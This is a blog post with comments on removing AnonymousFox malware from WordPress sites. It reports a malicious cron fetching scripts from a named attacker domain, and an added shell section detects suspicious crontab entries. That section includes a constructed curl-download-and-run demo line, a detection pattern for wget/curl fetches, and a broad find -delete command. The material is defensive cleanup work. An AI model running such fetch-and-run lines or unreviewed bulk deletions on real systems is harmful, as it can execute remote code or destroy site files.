The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website: removing the cronjobs.
While removing AnonymousFox malware from a website I noticed the following cron:
It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it. The script is:
It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt
source code:
This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:
grep -r "Deny from all" *
To remove all these .htaccess files:
find -type f -name '*htaccess*' -delete
As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that Sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.
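An added example, not part of the original post: shell helpers that flag crontab entries fetching remote content and list only files named exactly .htaccess that contain the deny rule, so the list can be reviewed before anything is deleted (the find command above matches every file with htaccess in its name). The function names, the demo tree and the example.invalid cron line are constructed for illustration.

```bash
#!/bin/sh
# Added example (not from the original post); all sample data is constructed.

# Read crontab text on stdin and print, for review, every active entry that
# fetches something over HTTP(S) with wget or curl.
suspicious_cron() {
    grep -v '^[[:space:]]*#' | grep -E '(wget|curl)[^|;]*https?://' || true
}

# List files named exactly .htaccess under $1 that contain the deny rule.
# Starting at the directory itself also covers its own top-level .htaccess,
# which the shell glob * does not expand to.
find_deny_htaccess() {
    find "$1" -type f -name '.htaccess' -exec grep -l 'Deny from all' {} + | sort
}

# Delete only the paths given on stdin, one per line, after they were reviewed.
delete_listed() {
    while IFS= read -r f; do rm -f -- "$f"; done
}

# Constructed crontab: one ordinary job, one that downloads and runs a script.
demo_cron() {
    printf '%s\n' '# m h dom mon dow command' \
        '0 3 * * * /usr/bin/php /home/user/public_html/wp-cron.php' \
        '*/10 * * * * curl -so /tmp/x http://example.invalid/x && sh /tmp/x'
}

# Constructed site tree: two planted deny files, one legitimate .htaccess,
# and a backup file whose name merely contains "htaccess".
demo_setup() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/uploads" "$d/blog"
    printf 'Deny from all\n' > "$d/.htaccess"
    printf '<FilesMatch ".*">\nDeny from all\n</FilesMatch>\n' > "$d/wp-content/uploads/.htaccess"
    printf '# BEGIN WordPress\nRewriteEngine On\n# END WordPress\n' > "$d/blog/.htaccess"
    printf 'backup copy\n' > "$d/htaccess.bak"
    printf '%s\n' "$d"
}

demo_cron | suspicious_cron          # prints only the curl entry
tree=$(demo_setup)
find_deny_htaccess "$tree"           # prints the two planted files
rm -rf "$tree"
```

On a real site, run `crontab -l | suspicious_cron` and `find_deny_htaccess public_html`, review the output, and only then pipe the reviewed list into `delete_listed`.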
Hi, thanks for your blog!
May I know where to enter the command grep -r “Deny from all” *?
Thanks in advance!
Hello,
The command is used from the terminal (SSH). If you are using cPanel, look for the “Terminal” icon:
Then enter the folder where your website is located, for example:
cd public_html
where cd means enter and public_html is the directory name. Then use
grep -r "Deny from all" *
to find all .htaccess files that are blocking access.
If you are not using cPanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.